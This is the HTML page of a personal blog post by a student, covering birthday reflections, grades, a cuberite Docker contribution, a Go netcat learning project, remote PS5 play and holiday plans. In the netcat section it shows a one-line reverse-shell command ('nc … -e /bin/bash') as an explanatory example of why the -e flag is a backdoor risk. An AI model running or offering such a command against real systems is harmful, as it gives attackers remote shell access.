<!doctype html>
<!--
  Minimal Mistakes Jekyll Theme 4.27.3 by Michael Rose
  Copyright 2013-2025 Michael Rose - mademistakes.com | @mmistakes
  Free for personal and commercial use under the MIT license
  https://github.com/mmistakes/minimal-mistakes/blob/master/LICENSE
-->

<html lang="en-US" class="no-js">
  <head>
    <meta charset="utf-8">

<!-- begin _includes/seo.html --><title>End of beginning - Zihao’s Portfolio</title>
<meta name="description" content="A song I recently like">


  <meta name="author" content="Zihao Fu">
  
  <meta property="article:author" content="Zihao Fu">
  


<meta property="og:type" content="article">
<meta property="og:locale" content="en_US">
<meta property="og:site_name" content="Zihao&#39;s Portfolio">
<meta property="og:title" content="End of beginning">
<meta property="og:url" content="https://zihaofu245.me/chitchat/2025/12/19/end-of-beginning.html">


  <meta property="og:description" content="A song I recently like">



  <meta property="og:image" content="https://zihaofu245.me/assets/2025-12-19-resources/teaser.jpg">





  <meta property="article:published_time" content="2025-12-19T00:00:00+00:00">






<link rel="canonical" href="https://zihaofu245.me/chitchat/2025/12/19/end-of-beginning.html">












<!-- end _includes/seo.html -->



  <link href="/feed.xml" type="application/atom+xml" rel="alternate" title="Zihao's Portfolio Feed">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script>
  document.documentElement.className = document.documentElement.className.replace(/\bno-js\b/g, '') + ' js ';
  
</script>

<!-- For all browsers -->
<link rel="stylesheet" href="/assets/css/main.css">
<link rel="preload" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@latest/css/all.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
<noscript><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@latest/css/all.min.css"></noscript>



    <!-- Custom MathJax loader (Minimal Mistakes will place this inside head) -->
<script>
  window.MathJax = {
    tex: {
      inlineMath: [['\\(','\\)'], ['$', '$']],
      displayMath: [['\\[','\\]'], ['$$','$$']],
      processEscapes: true,
      tags: 'ams'
    },
    options: { skipHtmlTags: ['script','noscript','style','textarea','pre','code'] },
    svg: { fontCache: 'global' }
  };
</script>
<script async src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-svg.js"></script>
  </head>

  <body class="layout--single wide" dir="ltr">
    <nav class="skip-links">
  <ul>
    <li><a href="#site-nav" class="screen-reader-shortcut">Skip to primary navigation</a></li>
    <li><a href="#main" class="screen-reader-shortcut">Skip to content</a></li>
    <li><a href="#footer" class="screen-reader-shortcut">Skip to footer</a></li>
  </ul>
</nav>

    

<div class="masthead">
  <div class="masthead__inner-wrap">
    <div class="masthead__menu">
      <nav id="site-nav" class="greedy-nav">
        
        <a class="site-title" href="/">
          Welcome to My Portfolio!
          
        </a>
        <ul class="visible-links"><li class="masthead__menu-item">
              <a
                href="/"
                
                
              >Home</a>
            </li><li class="masthead__menu-item">
              <a
                href="/blog/"
                
                
              >Blog</a>
            </li><li class="masthead__menu-item">
              <a
                href="/archive/"
                
                
              >Archive</a>
            </li><li class="masthead__menu-item">
              <a
                href="/about/"
                
                
              >About</a>
            </li><li class="masthead__menu-item">
              <a
                href="/resume/"
                
                
              >Résumé</a>
            </li></ul>
        
        <button class="greedy-nav__toggle hidden" type="button">
          <span class="visually-hidden">Toggle menu</span>
          <div class="navicon"></div>
        </button>
        <ul class="hidden-links hidden"></ul>
      </nav>
    </div>
  </div>
</div>


    <div class="initial-content">
      




  
    



<nav class="breadcrumbs">
  <ol itemscope itemtype="https://schema.org/BreadcrumbList">
    
    
    
      
        <li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem">
          <a href="/" itemprop="item"><span itemprop="name">Home</span></a>

          <meta itemprop="position" content="1" />
        </li>
        <span class="sep">/</span>
      
      
        
        <li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem">
          <a href="/chitchat" itemprop="item"><span itemprop="name">Chitchat</span></a>
          <meta itemprop="position" content="2" />
        </li>
        <span class="sep">/</span>
      
    
      
      
        
        <li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem">
          <a href="/2025" itemprop="item"><span itemprop="name">2025</span></a>
          <meta itemprop="position" content="3" />
        </li>
        <span class="sep">/</span>
      
    
      
      
        
        <li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem">
          <a href="/12" itemprop="item"><span itemprop="name">12</span></a>
          <meta itemprop="position" content="4" />
        </li>
        <span class="sep">/</span>
      
    
      
      
        
        <li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem">
          <a href="/19" itemprop="item"><span itemprop="name">19</span></a>
          <meta itemprop="position" content="5" />
        </li>
        <span class="sep">/</span>
      
    
      
      
        <li class="current">End of beginning</li>
      
    
  </ol>
</nav>

  


<div id="main" role="main">
  
  <div class="sidebar sticky">
  


<div itemscope itemtype="https://schema.org/Person" class="h-card">

  
    <div class="author__avatar">
      <a href="https://zihaofu245.me/">
        <img src="/assets/images/profile.jpg" alt="Zihao Fu" itemprop="image" class="u-photo">
      </a>
    </div>
  

  <div class="author__content">
    <h3 class="author__name p-name" itemprop="name">
      <a class="u-url" rel="me" href="https://zihaofu245.me/" itemprop="url">Zihao Fu</a>
    </h3>
    
      <div class="author__bio p-note" itemprop="description">
        <p>Engineer, Computer Science student at HKUST. Interested in AI, systems, and more.</p>

      </div>
    
  </div>

  <div class="author__urls-wrapper">
    <button class="btn btn--inverse">Follow</button>
    <ul class="author__urls social-icons">
      
        <li itemprop="homeLocation" itemscope itemtype="https://schema.org/Place">
          <i class="fas fa-fw fa-map-marker-alt" aria-hidden="true"></i> <span itemprop="name" class="p-locality">Hong Kong</span>
        </li>
      

      

      

      
        <li>
          <a href="mailto:zihaofu12@gmail.com" rel="me" class="u-email">
            <meta itemprop="email" content="zihaofu12@gmail.com" />
            <i class="fas fa-fw fa-envelope-square" aria-hidden="true"></i><span class="label">Email</span>
          </a>
        </li>
      

      

      

      

      
        <li>
          <a href="https://www.linkedin.com/in/zihao-fu-198b02374" itemprop="sameAs" rel="nofollow noopener noreferrer me">
            <i class="fab fa-fw fa-linkedin" aria-hidden="true"></i><span class="label">LinkedIn</span>
          </a>
        </li>
      

      

      
        <li>
          <a href="https://instagram.com/zihao_fu06" itemprop="sameAs" rel="nofollow noopener noreferrer me">
            <i class="fab fa-fw fa-instagram" aria-hidden="true"></i><span class="label">Instagram</span>
          </a>
        </li>
      

      

      

      
        <li>
          <a href="https://github.com/ZihaoFU245" itemprop="sameAs" rel="nofollow noopener noreferrer me">
            <i class="fab fa-fw fa-github" aria-hidden="true"></i><span class="label">GitHub</span>
          </a>
        </li>
      

      

      

      

      

      

      

      

      

      

      

      

      

      

      <!--
  <li>
    <a href="http://link-to-whatever-social-network.com/user/" itemprop="sameAs" rel="nofollow noopener noreferrer me">
      <i class="fas fa-fw" aria-hidden="true"></i> Custom Social Profile Link
    </a>
  </li>
-->
    </ul>
  </div>
</div>

  
  </div>



  <article class="page" itemscope itemtype="https://schema.org/CreativeWork">
    <meta itemprop="headline" content="End of beginning">
    <meta itemprop="description" content="    A song I recently like">
    <meta itemprop="datePublished" content="2025-12-19T00:00:00+00:00">
    

    <div class="page__inner-wrap">
      
        <header>
          <h1 id="page-title" class="page__title" itemprop="headline">
            <a href="https://zihaofu245.me/chitchat/2025/12/19/end-of-beginning.html" itemprop="url">End of beginning
</a>
          </h1>
          

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          3 minute read
        
      </span>
    
  </p>


        </header>
      

      <section class="page__content" itemprop="text">
        
        <blockquote>
  <iframe data-testid="embed-iframe" style="border-radius:12px" src="https://open.spotify.com/embed/track/3qhlB30KknSejmIvZZLjOD?utm_source=generator" width="100%" height="200" frameborder="0" allowfullscreen="" allow="autoplay; clipboard-write; encrypted-media; fullscreen; picture-in-picture" loading="lazy"></iframe>
  <p>A song I recently like</p>
</blockquote>

<h2 id="every-action-comes-with-an-consequence">Every Action comes with an consequence</h2>

<p>After I decided to live in the moment back in September, the consequences came quickly.
December has arrived, would
there be a miracle in the rest 11 days to save me from reality?</p>

<p>Back to todays topic, end of beginning. Why do I choose this header?</p>

<ol>
  <li>
    <p>December is my birthday month, and I turned 19, which I realized my joyful childhood
has came to an end. End of 18 years of child life, what waiting for me is the next 10 years of new era.
I little bit sad.</p>
  </li>
  <li>
    <p>From 2025 spring term, I tried so hard to improve my GPA. And after all that
hard works, I improved <strong>0.01</strong>. So I wondered, what is the necessity of studying so hard?
To fulfil my ego? Thus this term I decided to live the moment, and consequences came.
I have an answer now, to make me feel good, get a below median do hurts. End of my
experiment of living the moment. <strong>Reserve a seat for myself in library.</strong></p>
  </li>
  <li>
    <p>I am watching “Dark”, that famous show. It really inspired me of thinking about time,
and Causality. The “dark world” is really fascinating, a circled timeline. Past effects future,
and future effects past, like past and future are if and only if relationships. When is end?
When is beginning? End of beginning should be end <strong>and</strong> beginning.</p>
  </li>
</ol>

<figure style="text-align:center;">
  <img src="/assets/2025-12-19-resources/whiskey.jpg" alt="Thai food" style="width:50%;max-width:440px;display:block;margin:0 auto;" />
</figure>
<div style="text-align:center; font-size:0.85rem;color:#64748b;margin-top:.4rem;">Bar at coast</div>

<p>This term, I did not take too much photos. It feels like September and October slipped away
in a sudden, while November are surprisingly slow.</p>

<h2 id="what-ive-been-doing">What I’ve been doing</h2>

<h3 id="my-first-pr-contribute-to-public-repo">My first PR contribute to public repo</h3>

<p>I am making docker container support for <a href="https://github.com/cuberite/cuberite/pull/5621">cuberite</a>,
a community version of minecraft server. The server only supports up to 1.14 version of minecraft,
it is a major drawback. But in contrast to official server, it is written in C++, giving high performance
comparing to java server. It can run easily on a raspberry pi. This server is missing container shipping,
therefore I am writing one.</p>

<blockquote>
  <p>An annoying thing is the CI, MSVC build failed, but clang and g++ on ubuntu has no problem.</p>
</blockquote>

<h3 id="netcat-implemented-in-golang">Netcat implemented in Golang</h3>

<p>I am new to golang, it is used widely in network scenarios, concurrency has made go unique.
There are people already implemented netcat in golang, mine is for learning go. Here is the repo,
<a href="https://github.com/ZihaoFU245/netcat-go">netcat-go</a>. Some basic features are ready to use, while
some fancy ones, like hexdump, file sharing, is not yet ready.</p>

<p>Netcat <code class="language-plaintext highlighter-rouge">-e</code> flag in history is considered as a backdoor, which can act like a reverse shell.
<code class="language-plaintext highlighter-rouge">nc &lt;dest ip&gt; &lt;port&gt; -e /bin/bash</code>, this can act like a backdoor. 50 lines of code can make your
device insecure.</p>

<h3 id="remotely-playing-ps5">Remotely playing PS5</h3>

<p>I am thinking of a way to remotely playing PS5 in low latency. The official PS remote app
is dummy, even under a VPN which is Layer 3, it can not find PS5 machine, and traffic will be routed
through Sony’s server giving higher latency and introduce instability. If PS5 is directly exposed
in public internet, then it will be direct, but under most cases, it is behind a NAT.</p>

<p>I will be setting up PS5 in my madrid house, and use chiaki, a community PS remote application,
which support a direct ip connection. I can utilize my tailnet, to give a direct connection.</p>

<p>Inspired by this, I have bought a HDMI video capture card. Combined with a remote IR control</p>

<h2 id="what-i-gonna-do-in-winter-holiday">What I gonna do in winter holiday</h2>

<h3 id="home-lab-set-up">Home Lab Set up</h3>

<p>I will be setting up my own home lab in Madrid. A usual home lab, you could possibly think of,
require powerful CPUs or 4090s. Mine is much shallower, a raspberry pi. I small raspberry pi
with a public ipv4 can be way powerful then you think. Set up services that only used by few people,
VPNs, remote control, minecraft server (I would use an old thinkbook laptop more likely), etc.</p>

<h3 id="switch-to-linux-ubuntu">Switch to Linux (Ubuntu)</h3>

<p>I am quite tired of using windows. Windows file systems, services, powershell, cmd, etc, are
not as easy as Unix I personally believe. With the power of Wine and Proton, developed by valve,
I can play my games on Linux as well.</p>

<h3 id="traveling">Traveling</h3>

<p>Dec 22th to 25th, I will be Nice, France. Jan 1th to 8th I will go to Denmark and Norway, mainly go
to watch northern lights. By that time, I will have posted a travel blog contained my best photos.</p>

<hr />

<blockquote>
  <p>I do feel this term one reason I didn’t get good grades is because I focus on too much on my
personal hobbies</p>
</blockquote>

<blockquote>
  <p>I have decided to separate technical blogs with general chitchat blogs, with better focus.</p>
</blockquote>

        
      </section>

      <footer class="page__meta">
        
        


        

  <p class="page__date"><strong><i class="fas fa-fw fa-calendar-alt" aria-hidden="true"></i> Updated:</strong> <time class="dt-published" datetime="2025-12-19T00:00:00+00:00">December 19, 2025</time></p>

      </footer>

      

      
  <nav class="pagination">
    
      <a href="/general/2025/11/28/infrastructure.html" class="pagination--pager" title="Building My Self-Hosted Digital Ecosystem :)">Previous</a>
    
    
      <a href="/travel/2026/01/15/2026-first-post.html" class="pagination--pager" title="Travel album Jan.2026">Next</a>
    
  </nav>


    </div>

    
  </article>

  
  
</div>

      
    </div>

    

    <div id="footer" class="page__footer">
      <footer>
        <!-- start custom footer snippets -->

<!-- end custom footer snippets -->
        <div class="site-footer-meta" style="text-align:center; margin-top:20px; font-size:0.9em; color:#777;">
    <div
        style="display:flex; flex-wrap:nowrap; justify-content:center; align-items:center; gap:12px; white-space:nowrap;">
        <span>© 2025 Zihao Fu</span>
        <span aria-hidden="true">•</span>
        <a href="https://www.buymeacoffee.com/zihaofu245" target="_blank" rel="noopener noreferrer"
            title="Buy me a coffee" aria-label="Buy me a coffee" style="display:inline-flex; align-items:center;">
            <img src="https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png" alt="Buy Me A Coffee"
                style="height:48px; width:auto; vertical-align:middle; border-radius:6px;">
        </a>
        <span aria-hidden="true">•</span>
        <span>Powered by <a href="https://jekyllrb.com/" target="_blank" rel="noopener">Jekyll</a> &amp; <a
                href="https://github.com/mmistakes/minimal-mistakes" target="_blank" rel="noopener">Minimal
                Mistakes</a></span>
    </div>
</div>
      </footer>
    </div>

    
  <script src="/assets/js/main.min.js"></script>









  </body>
</html>
